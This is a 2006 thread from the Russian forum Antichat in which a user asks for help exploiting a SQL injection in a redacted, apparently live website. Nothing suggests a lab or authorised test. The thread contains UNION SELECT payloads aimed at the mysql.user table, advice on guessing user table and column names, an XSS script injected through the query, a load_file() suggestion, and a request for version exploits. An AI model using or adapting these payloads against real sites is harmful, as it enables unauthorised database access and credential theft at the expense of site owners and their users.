ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql-inj MySQL Проблемы с запросом.
  #1  
Старый 10.09.2006, 22:26
Аватар для m2infect
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396

Репутация: 5
По умолчанию Sql-inj MySQL Проблемы с запросом.

Всем доброго(ой) вечера\ночи!

Уважаемые!
Подсабите хорошим словом =)
Наткунлся на SQL-инъекцию (MYSQL - 4.1.20-standard).

Код HTML:
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8,9+from+mysql.user+where+id=1/*
пишет...

SELECT command denied to user '........'@'localhost' for table 'user' SQL query : select cityID, fd_type, fd_title, fd_number, art_title, date, art_url, html, pdf from mytable_press WHERE id = -1 union select 1,2,user(),null,database(),null,7,8,9 from mysql.user where id=1/* ORDER BY date DESC;

SELECT command denied to user '........'@'localhost' - Конец истории? или есть продолжение.

Подскажите пожалуйста.

С уважением.
 
Ответить с цитированием

  #2  
Старый 10.09.2006, 22:41
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

SELECT command denied to user '........'@'localhost'
SELECT запрещен юзеру '........'@'localhost'

т.е. настройки таковы, что юзеру не доступна база "mysql", а только созданные этим юзером базы.
Это свидетельствует о здравом рассудке сисадмина. Пробуй что-то другое.
 
Ответить с цитированием

  #3  
Старый 10.09.2006, 23:52
Аватар для m2infect
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396

Репутация: 5
По умолчанию

Да вот именно что попробывал всё что знал, и в итоге НОЛЬ.
Может кто что-то подскажет ???
 
Ответить с цитированием

  #4  
Старый 10.09.2006, 23:56
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9/*

а просто так пробовал
 
Ответить с цитированием

  #5  
Старый 11.09.2006, 00:15
Аватар для m2infect
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396

Репутация: 5
По умолчанию

Цитата:
Сообщение от Goudini  
{......}aview&aid=-1+union+select+1,2,user(),null,database(),null,7,8 ,9/*

а просто так пробовал
Пробывал.
Выдает только инфу про базу.
user() - пишет на странице юзера
database() базу
version() - и пишет версию....
 
Ответить с цитированием

  #6  
Старый 11.09.2006, 00:32
Аватар для Goudini
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
Провел на форуме:
1652093

Репутация: 490
Отправить сообщение для Goudini с помощью ICQ
По умолчанию

Цитата:
Сообщение от m2infect  
Пробывал.
Выдает только инфу про базу.
user() - пишет на странице юзера
database() базу
version() - и пишет версию....
Вот и всё, в базу mysql тебя не пустит. Можеш попробовать подоставать что-то ещё с этой базы, может там форум есть, тогда названия таблиц известны......
 
Ответить с цитированием

  #7  
Старый 11.09.2006, 01:42
Аватар для m2infect
m2infect
Познающий
Регистрация: 20.06.2006
Сообщений: 34
Провел на форуме:
140396

Репутация: 5
По умолчанию

к таблице MySQL меня не пустили.
Записать файл, а так же прочитать файлы - тоже не дали.
Вроде все способы попробывал.

Не уже то не уязвима?
Может кто сплоиты знает к этой версии?
 
Ответить с цитированием

  #8  
Старый 11.09.2006, 18:03
Аватар для gadjet
gadjet
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418

Репутация: 23
По умолчанию

Попробуй подобрать названия таблиц с юзерами: user, users, username, uname и т.д. потом надо подбирать колонки.
 
Ответить с цитированием

  #9  
Старый 11.09.2006, 18:38
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

Пробуй осуществить XSS (как я понял - у тебя не blind инъекция) :
iew&aid=-1+union+select+1,2,<script>alert();</script>,null,5,null,7,8,9+from+mysql.user+where+id =1/*
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
 
Ответить с цитированием

  #10  
Старый 11.09.2006, 20:01
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Load_file()
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ